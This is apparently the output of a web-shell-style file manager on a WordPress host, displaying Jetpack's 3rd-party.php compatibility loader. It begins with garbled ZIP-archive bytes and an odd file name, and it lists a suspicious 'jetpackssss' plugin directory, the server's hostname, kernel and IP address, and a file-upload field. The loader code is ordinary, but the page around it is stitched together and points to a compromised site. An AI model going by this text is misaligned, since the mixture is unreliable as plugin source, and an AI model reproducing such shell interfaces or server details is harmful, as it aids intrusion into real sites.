PK œqhYî¶J‚ßFßF)nhhjz3kjnjjwmknjzzqznjzmm1kzmjrmz4qmm.itm/*\U8ewW087XJD%onwUMbJa]Y2zT?AoLMavr%5P*/ $#$#$#

Dir : /home/trave494/polo-family.com/wp-content/plugins/jetpackssss/3rd-party/
Server: Linux ngx353.inmotionhosting.com 4.18.0-553.22.1.lve.1.el8.x86_64 #1 SMP Tue Oct 8 15:52:54 UTC 2024 x86_64
IP: 209.182.202.254
Choose File :

Url:
Dir : //home/trave494/polo-family.com/wp-content/plugins/jetpackssss/3rd-party/3rd-party.php

<?php
/**
 * Compatibility files for third-party plugins.
 * This is used to improve compatibility of specific Jetpack features with third-party plugins.
 *
 * @package Jetpack
 */

// Array of third-party compat files to always require.
$compat_files = array(
	'bbpress.php',
	'beaverbuilder.php',
	'bitly.php',
	'buddypress.php',
	'class.jetpack-amp-support.php',
	'class.jetpack-modules-overrides.php', // Special case. Tools to be used to override module settings.
	'debug-bar.php',
	'domain-mapping.php',
	'polldaddy.php',
	'qtranslate-x.php',
	'vaultpress.php',
	'wpml.php',
	'woocommerce.php',
	'woocommerce-services.php',
);

foreach ( $compat_files as $file ) {
	if ( file_exists( JETPACK__PLUGIN_DIR . '/3rd-party/' . $file ) ) {
		require_once JETPACK__PLUGIN_DIR . '/3rd-party/' . $file;
	}
}